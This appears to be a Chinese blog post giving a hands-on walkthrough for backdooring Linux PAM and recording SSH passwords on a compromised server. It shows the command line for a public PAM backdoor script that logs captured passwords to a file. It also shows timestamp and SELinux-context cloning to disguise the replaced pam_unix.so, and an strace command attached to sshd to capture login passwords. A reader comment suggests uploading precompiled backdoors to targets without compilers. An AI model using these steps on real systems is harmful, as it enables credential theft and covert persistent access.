一般路过PAM后门 / SSH密码记录

请注意,本文编写于 1042 天前,最后修改于 1042 天前,其中某些信息可能已经过时。

直接开始

原理很多咱也不多说了,主要聊聊版本查询的问题。
中文搜索直接搜索关于pam版本信息的,大部分都是关于pam后门,内容几乎千篇一律,少部分是讲解PAM作用的。

rpm -qa |grep pam

然后debian系的下运行这个命令很大概率回会啥也不返回。这时候我们就应该用

dpkg -l | grep pam

这样子就行了

QQ截图20210204235236.png
QQ截图20210204235236.png

推荐一个脚本

Linux-PAM-BACKDOOR

脚本使用方法就是

./backdoor.sh -m save -v 1.3.0 -o /tmp/log.txt

其中o为密码保存路径

之后就是克隆时间了

touch pam_unix.so -r pam_unix.so.src
ls -Z pam_unix.so.src
chcon –reference=pam_unix.so.src pam_unix.so

另外一种方案

如果只是为了记录密码

昨晚还从九世那学来一种新的

pid=ps -elf | grep "sshd -D" | grep -v grep | awk '{print $4}'
screen strace -f -p $pid -o /tmp/test.log -e trace=read,write -s 2048 &

photo_2021-02-06_18-24-01.jpg
photo_2021-02-06_18-24-01.jpg

添加新评论

已有 2 条评论

编译好直接上传啊,常见版本就那么几个,对面又整天没gcc没啥的